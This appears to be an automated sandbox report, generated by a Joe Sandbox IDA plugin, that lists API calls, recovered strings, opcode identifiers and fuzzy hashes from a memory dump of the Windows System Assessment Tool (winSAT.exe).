                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Library$FormatFreeLoadMessageStringType
                                                                                                                                                                                              • String ID: H$Wininet.dll$netmsg.dll
                                                                                                                                                                                              • API String ID: 270474373-1005095589
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Library$FormatFreeLoadMessageStringType
                                                                                                                                                                                              • String ID: H$Wininet.dll$netmsg.dll
                                                                                                                                                                                              • API String ID: 270474373-1005095589
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$CreateOpen
                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT$WinSAT regisrty key missing - create the winsat key$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1299239824-193752149
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Heap$Process$AllocErrorFirmwareFreeLastSystemTable
                                                                                                                                                                                              • String ID: BMSR
                                                                                                                                                                                              • API String ID: 3794700658-2095607670
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FE0840: GetLastError.KERNEL32(?,?,?,00007FF780FF0D7D), ref: 00007FF780FE0872
                                                                                                                                                                                                • Part of subcall function 00007FF780FE0840: RegCloseKey.ADVAPI32(?,?,?,00007FF780FF0D7D), ref: 00007FF780FE0891
                                                                                                                                                                                                • Part of subcall function 00007FF780FE0840: SetLastError.KERNEL32(?,?,?,00007FF780FF0D7D), ref: 00007FF780FE08A4
                                                                                                                                                                                              • SetLastError.KERNEL32 ref: 00007FF780FB0F2E
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$Close
                                                                                                                                                                                              • String ID: $SkipFileDelete$base\winsat\exe\datastore.cpp
                                                                                                                                                                                              • API String ID: 2117561858-1378043259
                                                                                                                                                                                              • Opcode ID: d3326061a4eefa1869982633472d77142edb3e95a824fc51a1e6ce28615a36aa
                                                                                                                                                                                              • Instruction ID: 6361d5d496a324b6bf5bf614612448f83fd05b44da60440cc8eacc05d15ebf49
                                                                                                                                                                                              • Opcode Fuzzy Hash: d3326061a4eefa1869982633472d77142edb3e95a824fc51a1e6ce28615a36aa
                                                                                                                                                                                              • Instruction Fuzzy Hash: E6517222B1C68296EB20BB25E8501FDA760FF85794FE09135EA4E477E5DE3CE944CB10
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast__uncaught_exception$ExceptionThrow
                                                                                                                                                                                              • String ID: </metrics>$</winspr>$<IsFormal/>$<metrics>$<winspr>$xmlns="http://www.microsoft.com/winsat.xsd"
                                                                                                                                                                                              • API String ID: 2864429452-1451767560
                                                                                                                                                                                              • Opcode ID: 548d7fd57bfcb86c23ae2b33cfd82f4df3a9468c1205110824524e2e7cf61f22
                                                                                                                                                                                              • Instruction ID: 841fa6b01437056d92d3c503c39802167586184689b17ec805396651694420af
                                                                                                                                                                                              • Opcode Fuzzy Hash: 548d7fd57bfcb86c23ae2b33cfd82f4df3a9468c1205110824524e2e7cf61f22
                                                                                                                                                                                              • Instruction Fuzzy Hash: BA519E21A0C64240EE24BB2699513B9A351BF88BB4FE48731D97D073E6DF6CF145C620
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780FAFF56
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: GetModuleHandleW.KERNEL32(?,?,00000001,00007FF780F94E15), ref: 00007FF780FDC71A
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: FindResourceW.KERNEL32 ref: 00007FF780FDC79D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: SizeofResource.KERNEL32 ref: 00007FF780FDC7BE
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LoadResource.KERNEL32 ref: 00007FF780FDC7D8
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LockResource.KERNEL32 ref: 00007FF780FDC7F0
                                                                                                                                                                                                • Part of subcall function 00007FF780FA9C0C: __uncaught_exception.MSVCRT ref: 00007FF780FA9DE6
                                                                                                                                                                                                • Part of subcall function 00007FF780FA2944: __uncaught_exception.MSVCRT ref: 00007FF780FA2A2B
                                                                                                                                                                                              • SetLastError.KERNEL32 ref: 00007FF780FAFE0F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$__uncaught_exception$ErrorExceptionFindHandleLastLoadLockModuleSizeofThrow
                                                                                                                                                                                              • String ID: %s\%04d-%02d-%02d %02d.%02d.%06.3f %sAssessment (%s)%s$.WinSAT.xml$Initial$Prepop$Recent$base\winsat\exe\datastore.cpp
                                                                                                                                                                                              • API String ID: 2870604065-1136351508
                                                                                                                                                                                              • Opcode ID: 581f6557769874b9caf71b36b16fed06e0a8285577833d249764be9238837a21
                                                                                                                                                                                              • Instruction ID: 42eac494af68a7056d8496f37e958ec4714138a71b1b4e4d5523142bc202e26c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 581f6557769874b9caf71b36b16fed06e0a8285577833d249764be9238837a21
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D51C631A0C74283D724EB16E8901A9E760FB85790FA0A135EA4D477E5DF7CF955C720
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: StringType$ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: pos is > string length
                                                                                                                                                                                              • API String ID: 1420024681-1677109599
                                                                                                                                                                                              • Opcode ID: ffd79ee95c958e5184ba19f1e7012cde39c1359b6950366d14ea321e7ea7ebff
                                                                                                                                                                                              • Instruction ID: 36ea74d39d9c9f1d5437aae435e18fee5e022a13eb6fb1eaa3c0e3f1b77767a3
                                                                                                                                                                                              • Opcode Fuzzy Hash: ffd79ee95c958e5184ba19f1e7012cde39c1359b6950366d14ea321e7ea7ebff
                                                                                                                                                                                              • Instruction Fuzzy Hash: E071BF26B0D64281FB10AB62D4102FDA7A1BB85B8CFA49131CE0D177D6DE7CF46AC360
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnabledErrorEventLast$CountCurrentProcessTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: $ERROR: %#08X GetAllWinSATAssessmentFileNames failed.$ERROR: %#08X GetWinSATDataStoreDir failed.$base\winsat\exe\datastore.cpp
                                                                                                                                                                                              • API String ID: 2434953431-2477654378
                                                                                                                                                                                              • Opcode ID: b0a2a4882fa2028f924a65576c508de44b6216415d3e2cd81f056cb6c5f1fbe6
                                                                                                                                                                                              • Instruction ID: 13f97c518d6b8eb287348954a771b841696adddc2653447bf4b2fc46707cf7f5
                                                                                                                                                                                              • Opcode Fuzzy Hash: b0a2a4882fa2028f924a65576c508de44b6216415d3e2cd81f056cb6c5f1fbe6
                                                                                                                                                                                              • Instruction Fuzzy Hash: F7714121B1DA4292EA50FB11E8506B9E350FFC5794FE0A031EA4E877E6DE2CF905CB50
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: StringType$ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: pos is >= string length
                                                                                                                                                                                              • API String ID: 1420024681-2903460325
                                                                                                                                                                                              • Opcode ID: d4800845e33a63bc32fc1e668ffefbfff9f80fe0570128d63de91f72c096ab2d
                                                                                                                                                                                              • Instruction ID: e7a533799b14b0aeb900d2f2fca0159bd5e2704f7207d5459c81fc450d2eef47
                                                                                                                                                                                              • Opcode Fuzzy Hash: d4800845e33a63bc32fc1e668ffefbfff9f80fe0570128d63de91f72c096ab2d
                                                                                                                                                                                              • Instruction Fuzzy Hash: B1518416B0D74296FB20ABA2D4002BEA761BB49B9CFA49131CE0D1B7D4DE7CF45AC350
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleModule$CriticalInitializeSectionmemset
                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                              • API String ID: 2718962744-2564639436
                                                                                                                                                                                              • Opcode ID: a5870af077abcccb94e2238b01f323aafd47aa4e0208380a18c8d3ec853ec688
                                                                                                                                                                                              • Instruction ID: 09248bd66211b187fe552beaeb27e3e90798b5be24a75d7efeed1d0038981269
                                                                                                                                                                                              • Opcode Fuzzy Hash: a5870af077abcccb94e2238b01f323aafd47aa4e0208380a18c8d3ec853ec688
                                                                                                                                                                                              • Instruction Fuzzy Hash: 34812532A09B80CAE700DF74E84429C77B5FB04B58F548239CA5D2B7AADF389069C764
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___lc_handle_func.MSVCRT(?,?,?,00000000,00000000,00007FF780F92486), ref: 00007FF7810A461F
                                                                                                                                                                                              • ___lc_codepage_func.MSVCRT(?,?,?,00000000,00000000,00007FF780F92486), ref: 00007FF7810A4628
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,00000000,00000000,00007FF780F92486), ref: 00007FF7810A4689
                                                                                                                                                                                              • _errno.MSVCRT(?,?,?,00000000,00000000,00007FF780F92486), ref: 00007FF7810A46A7
                                                                                                                                                                                              • __pctype_func.MSVCRT(?,?,?,00000000,00000000,00007FF780F92486), ref: 00007FF7810A46BE
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,00000000,00000000,00007FF780F92486), ref: 00007FF7810A470A
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,00000000,00000000,00007FF780F92486), ref: 00007FF7810A4742
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
• Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharMultiWide$___lc_codepage_func___lc_handle_func__pctype_func_errno
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 421588663-0
                                                                                                                                                                                              • Opcode ID: ae56b83ad9c13da46f90dab1eb4e49b5b61b40e439f9a70da339b1ef986ca986
                                                                                                                                                                                              • Instruction ID: f1c024ed65624a319bfdcb17ce89c20355069226b7913726601ab11b7b0aaae2
                                                                                                                                                                                              • Opcode Fuzzy Hash: ae56b83ad9c13da46f90dab1eb4e49b5b61b40e439f9a70da339b1ef986ca986
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E41A73AA08782C6E710AF169D00178B7A0BF59B94F784135DA898B791DFBCE451C731
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$DeleteFile
                                                                                                                                                                                              • String ID: $base\winsat\exe\datastore.cpp
                                                                                                                                                                                              • API String ID: 2815225636-844843430
                                                                                                                                                                                              • Opcode ID: a5564abd8709009237ef8a2c83dce2529d74814c89a6f2025dd7930ea92ffb15
                                                                                                                                                                                              • Instruction ID: be0a57de27dfc4b08ed5027575de5f4a2dcfe07b18476a26d2fbc23d57aa8f68
                                                                                                                                                                                              • Opcode Fuzzy Hash: a5564abd8709009237ef8a2c83dce2529d74814c89a6f2025dd7930ea92ffb15
                                                                                                                                                                                              • Instruction Fuzzy Hash: FE41BF22B0CA4285EB14EB16E8502B9F3A0FB85B94FE49131EA5D477D5DF3CE855C720
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: at is larger than buffer size$reserve is equal to npos
                                                                                                                                                                                              • API String ID: 1480402491-2198646489
                                                                                                                                                                                              • Opcode ID: 1693c0aa944adf6ccee7e5aa0a7875ad688975879ebba8e1b89f8b39f9d661d3
                                                                                                                                                                                              • Instruction ID: e230f4730e406903e10633af06fab75060fa1d828ae37d88aea0eca3b2aee050
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1693c0aa944adf6ccee7e5aa0a7875ad688975879ebba8e1b89f8b39f9d661d3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E418262A1DA86C0EB50EB25E451369B3A0FB85BB0FE48231DAAD077D5DF2CE405C720
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$EnvironmentVariable
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2691138088-0
                                                                                                                                                                                              • Opcode ID: a5fe005e695b21b615d4409c5b7ebbf6fe051a5afc6847355b597b694eeeb8b9
                                                                                                                                                                                              • Instruction ID: d011a9dc07c4c569d5dcc40343926e92ea5e031a4fb852e2b4e813d7a55c6d45
                                                                                                                                                                                              • Opcode Fuzzy Hash: a5fe005e695b21b615d4409c5b7ebbf6fe051a5afc6847355b597b694eeeb8b9
                                                                                                                                                                                              • Instruction Fuzzy Hash: AB417F35A0DA428AEB00AF16E85117DF7A0FB89F94FA9D134CA1E07795CF78E451C760
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: boq < end$boq > end
                                                                                                                                                                                              • API String ID: 1480402491-1743266199
                                                                                                                                                                                              • Opcode ID: 330fa67dad9a1903ec451b21651f11950c8b360f3213dc58239865c61c44a66c
                                                                                                                                                                                              • Instruction ID: ecc27ffd005b171647411af47ad300e7976c3c68ed83442a6c2518fe839fb5ae
                                                                                                                                                                                              • Opcode Fuzzy Hash: 330fa67dad9a1903ec451b21651f11950c8b360f3213dc58239865c61c44a66c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0141B462F1CA0A80EE10BB1AD4516BAA321FF94BD4FE09032DA4D077E5DF6CE556C360
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorExceptionLastThrowmemchrstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: str is null
                                                                                                                                                                                              • API String ID: 2671770384-2182108151
                                                                                                                                                                                              • Opcode ID: fa4b7f40e0cf9e95676a63a1b791ac678c5f46e21efe3bfacd931084074e675a
                                                                                                                                                                                              • Instruction ID: de98750409bf705b75311389aa4f232ca38a10a784e64486b3e9d721fba06168
                                                                                                                                                                                              • Opcode Fuzzy Hash: fa4b7f40e0cf9e95676a63a1b791ac678c5f46e21efe3bfacd931084074e675a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2431DF21A0C64281FA24BB26E8652B9A261BF84790FF0C035DA5E07BD5DE7CF051CB20
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: boq < end$boq > end
                                                                                                                                                                                              • API String ID: 1480402491-1743266199
                                                                                                                                                                                              • Opcode ID: 4eb33f3453a1a24120518c956fb7d5a5fedb60aab605e00ddad26cad4ac846de
                                                                                                                                                                                              • Instruction ID: 2cdf5f4e79ff958e636a81fc189ca710d70f69300dbcf4fc22dac244ce78c4fb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4eb33f3453a1a24120518c956fb7d5a5fedb60aab605e00ddad26cad4ac846de
                                                                                                                                                                                              • Instruction Fuzzy Hash: F921E061E2DA4684EF20B716D8513B9A3A1FF50784FE0A032E64E037E4EE2CF445C760
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseDirectoryHandleMutexReleaseRemoveUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1552449126-2481351200
                                                                                                                                                                                              • Opcode ID: cd91ec2066de2df89daa11ab069e221cc4274a19cbca8b155f9b1c4fa0c54e77
                                                                                                                                                                                              • Instruction ID: 7fe5efa7f79b385ef6c4fe62707942368d902fec7e69517265036fa433decf57
                                                                                                                                                                                              • Opcode Fuzzy Hash: cd91ec2066de2df89daa11ab069e221cc4274a19cbca8b155f9b1c4fa0c54e77
                                                                                                                                                                                              • Instruction Fuzzy Hash: 02416C21E0DA4295FB20BB11F850275EB60FF85B98FE45034D94E027A1CEADF854CB61
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseOpenQueryValue_wcsnicmp
                                                                                                                                                                                              • String ID: Locale$Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
                                                                                                                                                                                              • API String ID: 2262609651-1161606707
                                                                                                                                                                                              • Opcode ID: 1c8a1ebd95c7d6c3900b2f36966723cd74bcf3b5f3fbe721d261d7b69e227c7c
                                                                                                                                                                                              • Instruction ID: 5f3f1b90cbcc4f9f58aedb91f0141d80bcc4c7dc12d88171d215305a9f396c48
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c8a1ebd95c7d6c3900b2f36966723cd74bcf3b5f3fbe721d261d7b69e227c7c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0231BE36A18B42C6EB10AF55F84416AB7A5FB49B90FE14235EE9D03718EF7CE440CB20
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: StringTypeiswdigit
                                                                                                                                                                                              • String ID: +$.$.
                                                                                                                                                                                              • API String ID: 2361181425-1083070178
                                                                                                                                                                                              • Opcode ID: 6894a1cefe64487843db14900f88111ba45e613a7ebee7ca7c423cccc6463b8f
                                                                                                                                                                                              • Instruction ID: 2fc3dfe9316d8c06c1f8dbbbd80db5635843949697c5863874c6f2711538052c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6894a1cefe64487843db14900f88111ba45e613a7ebee7ca7c423cccc6463b8f
                                                                                                                                                                                              • Instruction Fuzzy Hash: C2212E66A0E94681DF606B17D4442BCA7A1FB55F88F98E031C61D073E4EFACE8A0C321
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                              • API String ID: 1480402491-4289949731
                                                                                                                                                                                              • Opcode ID: 33da871457f849afeb2ea9d3135d4241acf9e1be73d3778c02623f62942d3db9
                                                                                                                                                                                              • Instruction ID: 541e05b0a69aeb89028b4239f9c714b7677f10600fe3d881d7665afb44eeae61
                                                                                                                                                                                              • Opcode Fuzzy Hash: 33da871457f849afeb2ea9d3135d4241acf9e1be73d3778c02623f62942d3db9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 08010761A18A4B91DB20FB14E451295E321FB84374FE05331E5AD066E9DFACE549CB10
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$Resource$FindHandleLoadLockModuleSizeof
                                                                                                                                                                                              • String ID: H$base\winsat\exe\app.cpp
                                                                                                                                                                                              • API String ID: 2324310476-2745782611
                                                                                                                                                                                              • Opcode ID: 0ee5b5ec9a8e16899d29084875fadb3588918f9427494c48d729f24bbd051380
                                                                                                                                                                                              • Instruction ID: ed87bc9f0fdcdd7465565000bff1d579ddb1b6d89a9bead278809bcfa4059637
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ee5b5ec9a8e16899d29084875fadb3588918f9427494c48d729f24bbd051380
                                                                                                                                                                                              • Instruction Fuzzy Hash: A9017525B189418BF3017B20EC001BCAE51FB8EB65FE49130C90F42395DF7D9445CB20
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                              • String ID: *%s.Assessment (%s)$.WinSAT.xml$Initial$Prepop$Recent
                                                                                                                                                                                              • API String ID: 1452528299-1970178954
                                                                                                                                                                                              • Opcode ID: 70ccccdc94cd0a68233f563a8abbb9c68413d484faf92da40a1ad5d885aab81a
                                                                                                                                                                                              • Instruction ID: 78a5da3aff257052b930158597bb6792ef4b0f3ff2ea1a0abec3d12e18cd73d7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 70ccccdc94cd0a68233f563a8abbb9c68413d484faf92da40a1ad5d885aab81a
                                                                                                                                                                                              • Instruction Fuzzy Hash: E8316E61A1CB4285E710EB61D8885B9E760FB44790FE08136EE5D477E5DF7CE946C320
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseControlCreateDeviceEventHandle
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3513291518-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
• Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateHandle$LibraryLoadMappingView
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1262414356-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
